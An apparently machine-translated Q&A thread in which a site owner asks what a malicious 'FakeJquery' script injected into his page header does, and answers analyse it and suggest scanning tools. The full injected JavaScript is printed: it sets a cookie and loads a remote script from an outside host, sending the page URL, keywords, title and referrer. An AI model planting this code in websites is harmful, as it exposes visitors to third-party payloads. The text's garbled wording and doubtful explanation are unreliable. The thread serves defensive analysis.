Я подвергаюсь нападению хакеров веб сайта с рукописным шрифтом, который он снабжает ссылками в другой сайт

Недавно мой сайт был подвернут нападению хакеров, взломщикам удалось переслать webshell в сайт, однако уже все контролировалось и сайт уверен снова.

Сейчас eset nod32 я обнаруживаю у себя trojano fakejquery, исследуя немного я смог видеть, что в header страницы был введен следующий рукописный шрифт:

<script>
    var a = '';
    setTimeout(1);

    function setCookie(a, b, c) {
        var d = new Date;
        d.setTime(d.getTime() + 60 * c * 60 * 1e3);
        var e = "expires=" + d.toUTCString();
        document.cookie = a + "=" + b + "; " + e
    }

    function getCookie(a) {
        for (var b = a + "=", c = document.cookie.split(";"), d = 0; d < c
            .length; d++) {
            for (var e = c[d];
                " " == e.charAt(0);) e = e.substring(1);
            if (0 == e.indexOf(b)) return e.substring(b.length, e.length)
        }
        return null
    }
    null == getCookie("__cfgoid") && (setCookie("__cfgoid", 1, 1), 1 ==
        getCookie("__cfgoid") && (setCookie("__cfgoid", 2, 1), document.write(
            '<script type="text/javascript" src="' +
            'http://crazytime.home.pl/js/jquery.min.php' + '?key=b64' +
            '&utm_campaign=' + 'I92930' + '&utm_source=' + window.location.host +
            '&utm_medium=' + '&utm_content=' + window.location +
            '&utm_term=' + encodeURIComponent(
                ((k = (function() {
                        var keywords = '';
                        var metas = document.getElementsByTagName('meta');
                        if (metas) {
                            for (var x = 0, y = metas.length; x < y; x++) {
                                if (metas[x].name.toLowerCase() == "keywords") {
                                    keywords += metas[x].content;
                                }
                            }
                        }
                        return keywords !== '' ? keywords : null;
                    })()) == null ? (v = window.location.search.match(
                        /utm_term=([^&]+)/)) == null ? (t = document.title) == null ?
                    '' : t : v[1] : k)) + '&se_referrer=' + encodeURIComponent(
                document.referrer) + '"><' + '/script>')));
</script>

Под которым я понимаю предыдущий рукописный шрифт, произведи трафик во внешний сайт.

Уже я удалил весь этот код сайта, но я у себя остаюсь сомнение, из которого действительно он делает этот код.

Мой вопрос: Я нахожусь в правильном, подумав, что производится трафик во внешний сайт, или разделенный код ранее делает что-то добавочным?

52
задан 03.03.2018, 22:41
2 ответа

Ты был жертвой Блакк Хэт КАФЕДРАЛЬНЫЙ СОБОР и я верю в то, что более специально техника Спамминг Кеивордс, которая состоит, в вышеупомянутый контент наполняет контент веб сайта ключевыми словами spammeando. Это также известно, как Keyword stuffing или Spamdexing.

Все эти техники считают целью изменять ranking сайта в поисковых службах и это двустороннее оружие, так как поисковые службы обладают программными средствами, чтобы обнаруживать выражение spam и могут удалять твою страницу ranking как следствие.

Много поисковых служб проверяют, если он существует spamdexing, и они удаляют из Ваших индексов подозрительные страницы.

Эта часть

document.write('<script type="text/javascript" src="' +

     /**** Esta es la url a donde va el tráfico ***/

     'http://crazytime.home.pl/js/jquery.min.php' + 

     '?key=b64' + '&utm_campaign=' + 'I92930' + '&utm_source=' +
      window.location.host + '&utm_medium=' + '&utm_content=' + 
      window.location + '&utm_term=' ..........

Создай рукописный шрифт, который попробует загрузить внешнюю страницу, и используй keywords и даже титул твоей собственной страницы, чтобы перемещать их его из-за параметров в query

Этот фрагмент это тестирует

var k = (function() {
  var keywords = '';
  var metas = document.getElementsByTagName('meta');
  if (metas) {
    for (var x = 0, y = metas.length; x < y; x++) {
      if (metas[x].name.toLowerCase() == "keywords") {
        keywords += metas[x].content;
      }
    }
  }
  return keywords !== '' ? keywords : null;
})();

console.log(k);
<!DOCTYPE html>
<html>

<head>
  <meta name="keywords" content="hello world">
  <meta name="keywords" content="hola mundo">
</head>

<body>

</body>

</html>

Кроме того читай referrer твоей страницы и он это посылает

'&se_referrer=' + encodeURIComponent(document.referrer);

В конце концов и более важно сохраняй куки-файлы (" __ cfgoid") в браузерах людей, которые используют твой сайт.

function setCookie(a, b, c) {
  var d = new Date;
  d.setTime(d.getTime() + 60 * c * 60 * 1e3);
  var e = "expires=" + d.toUTCString();
  document.cookie = a + "=" + b + "; " + e
}

Я рекомендую тебе, сейчас, когда ты содержал угрозу, писать твой другой рукописный шрифт, чтобы отлаживать счастье куки-файл.

60
ответ дан 03.12.2019, 19:52
  • 1
    У тебя есть весь raz и # 243; n, сейчас я кладусь в задании удалить эту куки-файл, превосходный ответ!!! –  Juan Pinzón 18.10.2016, 01:48
  • 2
    @JuanPinz и # 243; n escrib и # 237; с чем-то из затруднительного положения. Aqu и # 237; у тебя есть update, который дает тебе лучше informaci и # 243; n, на котором я произошел, и # 243; действительно. Когда ему удастся проверить рукописный шрифт, который загружается, я могу давать тебе м и # 225; s informaci и # 243; n. –  devconcept 18.10.2016, 15:31

Используй это: http://virustotal.com он будет стоить Тебе для того, чтобы сканировать злонамеренные файлы и унифицированные указатели ресурса, что ты думаешь, что есть malware-вирус или не безопасные вещи.

Любопытное состоит в том, что унифицированный указатель ресурса уже был проанализирован, изначально бросило меня:

Унифицированный указатель ресурса already analysed

This унифицированный указатель ресурса was last analysed by VirusTotal on 2016-01-01 7:12:28 всеобщее скоординированное время, it was first analysed by VirusTotal on 2016-01-01 7:12:28 всеобщее скоординированное время.

Detection коэффициент: 0/66

You хан take в look at the last analysis or analyse it again now.

Однако проанализировав снова:

URL:    http://crazytime.home.pl/js/jquery.min.php
Detection ratio:    1 / 68
Analysis date:  2016-10-17 22:27:58 UTC ( 0 minutes ago )
File scan:  Go to downloaded file analysis

Результат:

https://virustotal.com / в / унифицированный указатель ресурса / 50464e88f0c2600be82edb631148a37660856f4ddae633de110dc3d6fdc43266 / analysis / 1476743278 /

Сейчас, с другой стороны, в public_html имей эту утилиту по отношению к руке: https://github.com/emposha/PHP-Shell-Detector

17
ответ дан 03.12.2019, 19:52